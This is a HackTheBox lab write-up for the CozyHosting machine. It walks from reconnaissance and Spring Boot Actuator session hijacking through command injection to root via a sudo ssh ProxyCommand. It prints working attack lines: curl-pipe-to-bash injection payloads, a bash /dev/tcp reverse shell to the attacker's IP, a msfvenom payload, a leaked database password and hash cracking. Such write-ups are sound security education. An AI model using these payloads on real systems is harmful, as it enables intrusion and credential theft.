WriteupsHTB — CozyHosting
WebEasyLinux
HTB — CozyHosting
Spring Boot Actuator exposes session cookies. Hijacked admin session to exploit command injection in SSH endpoint for reverse shell.
November 26, 2024HackTheBox
#Spring Boot#Actuator#Command Injection#RCE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 11:40 EST
Nmap scan report for 10.10.11.230
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/26%OT=22%CT=1%CU=37190%PV=Y%DS=2%DC=T%G=Y%TM=674
OS:5FA24%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53C
OS:ST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 22.31 ms 10.10.14.1
2 22.47 ms 10.10.11.230
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.36 seconds
80/tcp open http
sh
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
sh
feroxbuster --url http://cozyhosting.htb/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
204 GET 0l 0w 0c http://cozyhosting.htb/logout
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 285l 745w 12706c http://cozyhosting.htb/
500 GET 1l 1w 73c http://cozyhosting.htb/error
401 GET 1l 1w 97c http://cozyhosting.htb/admin
200 GET 285l 745w 12706c http://cozyhosting.htb/index
400 GET 1l 32w 435c http://cozyhosting.htb/[
400 GET 1l 32w 435c http://cozyhosting.htb/plain]
400 GET 1l 32w 435c http://cozyhosting.htb/]
400 GET 1l 32w 435c http://cozyhosting.htb/quote]
400 GET 1l 32w 435c http://cozyhosting.htb/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-9]
[####################] - 2m 30039/30039 0s found:31 errors:0
[####################] - 2m 30000/30000 208/s http://cozyhosting.htb/ - search for the error type and it comes out as spring boot java
spring boot seclist
sh
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/spring-boot.txtsh
ffuf -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt:FUZZ -u http://cozyhosting.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/spring-boot.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
actuator [Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 233ms]
actuator/sessions [Status: 200, Size: 48, Words: 1, Lines: 1, Duration: 145ms]
actuator/env/home [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 299ms]
actuator/env/lang [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 281ms]
actuator/env/path [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 257ms]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 294ms]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 284ms]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 268ms]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 335ms]
:: Progress: [112/112] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
- cookies replace and use chrome to access
/adminendpoint
sh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f elf > rev.elf- execute payload, this didnt work
sh
host=10.10.14.4&username=test;curl${IFS}http://10.10.14.4/rev.elf${IFS}|bashrev.sh
sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.4/443 0>&1sh
host=10.10.14.4&username=test;curl${IFS}http://10.10.14.4/rev.sh${IFS}|bash;sh
nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.230] 34426
bash: cannot set terminal process group (1062): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ whoami
whoami
appsh
app@cozyhosting:/app$ unzip cloudhosting-0.0.1.jar -d /tmp/appsh
app@cozyhosting:/tmp/app/BOOT-INF/classes$ cat application.properties
cat application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxRsh
app@cozyhosting:/tmp/app/BOOT-INF/classes$ netstat -tunlp
netstat -tunlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 1062/java
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* - psql
sh
psql -h localhost -U postgres
Vg&nvzAQ7XxRsh
python3 -c 'import pty; pty.spawn("/bin/bash")'sh
postgres=# \list
\list
WARNING: terminal is not fully functional
Press RETURN to continue
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privil
eges
-------------+----------+----------+-------------+-------------+----------------
-------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres
+
| | | | | postgres=CTc/po
stgres
(4 rows)sh
postgres=# \c cozyhosting
\c cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \dt
\dt
WARNING: terminal is not fully functional
Press RETURN to continue
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)
sh
cozyhosting=# select * from users;
select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue
name | password | role
-----------+--------------------------------------------------------------+-----
--
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admi
hashcat
sh
hashcat -m 3200 '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunitedcreds
manchesterunited
sh
app@cozyhosting:/home$ su josh
su josh
Password: manchesterunited
josh@cozyhosting:/home$ whoami
whoami
joshuser.txt
sh
josh@cozyhosting:~$ cat user.txt
cat user.txt
aa8a2946...priv esc
sudo
sh
josh@cozyhosting:/home$ sudo -l
sudo -l
[sudo] password for josh: manchesterunited
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *sudo ssh
sh
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
whoami
rootroot.txt
sh
cat root.txt
bc493293...Up next
EasyJan 2025
HTB — LinkVortex
Ghost CMS CVE-2023-40028 arbitrary file read vulnerability. Symlink traversal via config reveals credentials for lateral movement and sudo privesc.
Read writeup
EasyJan 2025
HTB — UnderPass
daloRADIUS web interface default credentials expose user hashes. Cracked MD5 hash for SSH. Mosh binary sudo privesc for root shell.
Read writeup
MediumJan 2025
HTB — Administrator
FTP credentials from initial account. Targeted Kerberoasting via BloodHound paths, GenericWrite abuse, DCSync for Domain Admin hash.
Read writeup